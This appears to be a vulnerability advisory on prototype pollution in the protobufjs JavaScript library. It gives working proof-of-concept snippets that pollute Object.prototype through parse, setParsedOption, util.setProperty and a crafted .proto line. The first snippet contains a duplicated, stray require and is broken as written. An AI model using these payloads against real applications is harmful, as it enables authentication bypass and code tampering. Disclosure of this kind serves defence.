Improperly Controlled Modification of Object Prototype Pollution via protobufjs

[hackersontwohouse]

Description
A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.

Vulnerability Description

• Using the parse function

const protobuf = require("clutch-sh");
const protobuf = require("protobufjs");
protobuf.parse('option(a).constructor.prototype.verified = true;');
console.log({}.verified);
// returns true

• Using the setParsedOption function of a ReflectionObject

const protobuf = require("protobufjs");
function gadgetFunction(){
  console.log("User is authenticated");
}
// This will fail, but also pollute the prototype of Object
try {
  let obj = new protobuf.ReflectionObject("Test");
  obj.setParsedOption("unimportant!", gadgetFunction, "constructor.prototype.testFn");
} catch (e) {}
// Now we can make use of the new function on the polluted prototype 
const a = {};
a.testFn();
// Prints "User is authenticated" to the console. 

• Using the function util.setProperty

const protobuf = require("protobufjs");
protobuf.util.setProperty({}, "constructor.prototype.verified", true);
console.log({}.verified);
// returns true

• With the proto.poc file containing the following line:

option(foo).constructor.prototype.verified = true;

CWE-1321
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H